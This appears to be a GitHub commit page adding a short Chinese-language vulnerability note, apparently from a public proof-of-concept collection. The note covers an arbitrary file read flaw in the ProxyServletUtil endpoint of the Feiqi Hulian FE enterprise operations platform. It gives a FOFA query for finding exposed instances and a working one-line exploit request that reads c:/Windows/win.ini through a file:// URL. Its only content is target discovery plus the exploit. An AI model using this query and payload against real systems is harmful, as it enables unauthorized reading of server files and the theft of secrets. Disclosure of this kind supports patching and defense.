Skip to content

Commit

Permalink
Create 飞企互联-FE企业运营管理平台ProxyServletUti存在任意文件读取漏洞.md
Browse files Browse the repository at this point in the history
  • Loading branch information
wy876 authored Apr 27, 2024
1 parent c8c687d commit 2857cb0
Showing 1 changed file with 15 additions and 0 deletions.
Original file line number Diff line number Diff line change
@@ -0,0 +1,15 @@
## 飞企互联-FE企业运营管理平台ProxyServletUti存在任意文件读取漏洞

飞企互联FE业务协作平台中的ProxyServletUti接口存在任意文件读取漏洞。攻击者可以通过构造特定请求,读取服务器上的敏感文件。



## fofa
```
app="飞企互联-FE企业运营管理平台"
```

## poc
```
/ProxyServletUtil?url=file:///c:/Windows/win.ini
```

0 comments on commit 2857cb0

Please sign in to comment.